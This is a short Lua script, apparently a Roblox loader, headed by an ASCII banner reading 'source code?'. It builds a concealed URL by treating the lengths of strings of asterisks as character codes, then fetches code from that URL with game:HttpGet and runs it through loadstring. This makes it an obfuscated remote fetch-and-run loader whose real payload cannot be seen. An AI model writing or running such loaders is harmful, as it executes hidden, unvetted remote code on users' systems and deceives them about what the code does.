--[[

                                               _     ___ 
  ___  ___  _   _ _ __ ___ ___    ___ ___   __| | __|__ \
 / __|/ _ \| | | | '__/ __/ _ \  / __/ _ \ / _` |/ _ \/ /
 \__ \ (_) | |_| | | | (_|  __/ | (_| (_) | (_| |  __/_| 
 |___/\___/ \__,_|_|  \___\___|  \___\___/ \__,_|\___(_) 
                                                         

--]]

function eHRiBFrQLNJDuMjyoZItAYmolzwRUO(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


loadstring(game:HttpGet((eHRiBFrQLNJDuMjyoZItAYmolzwRUO({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','*******************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************','*************************************************************************************************','************************************************************************************************************************','**********************************************','************************************************','************************************************','************************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*************************************************************************************************','****************************************************************************************************************','****************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','***********************************************************************************','*******************************************************************************','****************************************************************************','*********************************************************************','****************************************************************************************','*******************************************************************************','***************************************************************************************','******************************************************************************','******************************************************************************','***************************************************************************************','**********************************************','************************************************************************************************************************','*****************************************************************************************************'})),true))()    
